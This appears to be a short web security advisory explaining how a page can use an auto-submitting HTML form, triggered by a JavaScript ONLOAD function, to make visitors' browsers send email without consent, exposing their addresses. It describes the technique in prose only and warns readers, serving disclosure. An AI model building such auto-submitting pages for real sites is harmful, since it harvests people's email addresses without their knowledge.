The problem

It's possible for web pages to cause your browser to send email to remote people without your consent. This is troublesome for at least two reasons:

  1. If your browser knows your true email address, you've just given it out to a stranger.
  2. You are sending email to strangers, and you don't know the contents of the email. If the recipients find the email objectionable, they may complain to you, leading to confusion.

How it works

The email sniffer recorded here uses a FORM in the HTML document, with an ACTION that sends mail (and the FORM's INPUT elements) to whatever address is configured into the web page. Instead of waiting for the chance that the user may click on the form's submit button, the web page also defines a JavaScript "ONLOAD" function, with a definition that submits the form for the user.

The consequence: users with JavaScript enabled will automatically send mail to the address configured in the form when they load the tainted web page. A nasty use of JavaScript.

I've recorded one web page which does this. I advise turning JavaScript off before following these links. I've recorded their top level web page and the separate javascript file it references. The original pages try to obscure the meaning of the JavaScript, so I've also pared down the main page and edited the javascript file, to make the code more clear.